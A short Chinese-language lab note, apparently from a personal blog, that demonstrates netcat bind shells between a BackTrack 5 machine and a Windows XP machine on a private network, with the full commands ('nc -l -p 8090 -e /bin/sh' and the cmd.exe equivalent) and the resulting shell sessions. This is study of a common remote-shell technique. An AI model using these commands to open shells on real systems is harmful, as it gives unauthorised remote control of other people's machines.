netcat下载地址:http://sourceforge.net/projects/netcat/?source=navbar
在BT5上:
root@bt:~# nc -l -p 8090 -e /bin/sh
在XP上:
E:\>nc 192.168.1.11 8090
ls
Desktop
ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:8f:6e:f9
inet addr:192.168.1.11 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe8f:6ef9/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:191926 errors:0 dropped:0 overruns:0 frame:0
TX packets:190831 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:12197170 (12.1 MB) TX bytes:11565866 (11.5 MB)
Interrupt:19 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:114541 errors:0 dropped:0 overruns:0 frame:0
TX packets:114541 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:26430568 (26.4 MB) TX bytes:26430568 (26.4 MB)
然后在XP上:
E:\黑客\工具\netcat>nc -l -p 8090 -e C:\WINDOWS\system32\cmd.exe
在BT5上:
root@bt:~# nc 192.168.1.109 8090
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.
E:\黑客\工具\netcat>dir
dir
驱动器 E 中的卷是 本地磁盘
卷的序列号是 EC10-1C79
E:\黑客\工具\netcat 的目录
2013-07-06 17:16 <DIR> .
2013-07-06 17:16 <DIR> ..
2004-12-29 13:07 61,440 nc.exe
2013-07-06 16:44 75,267 nc110.tgz
2013-07-06 13:52 <DIR> nc111nt
2013-01-04 20:58 106,923 nc111nt.zip
2013-07-06 16:58 398,872 netcat-0.7.1.tar.gz
2013-04-09 21:06 439,215 netcat.rar
5 个文件 1,081,717 字节
3 个目录 4,692,963,328 可用字节
E:\黑客\工具\netcat>
比较了一下,在XP上获得bash后,前面没有shell提示符,但是在bt5上获得cmdshell,却能获得提示符。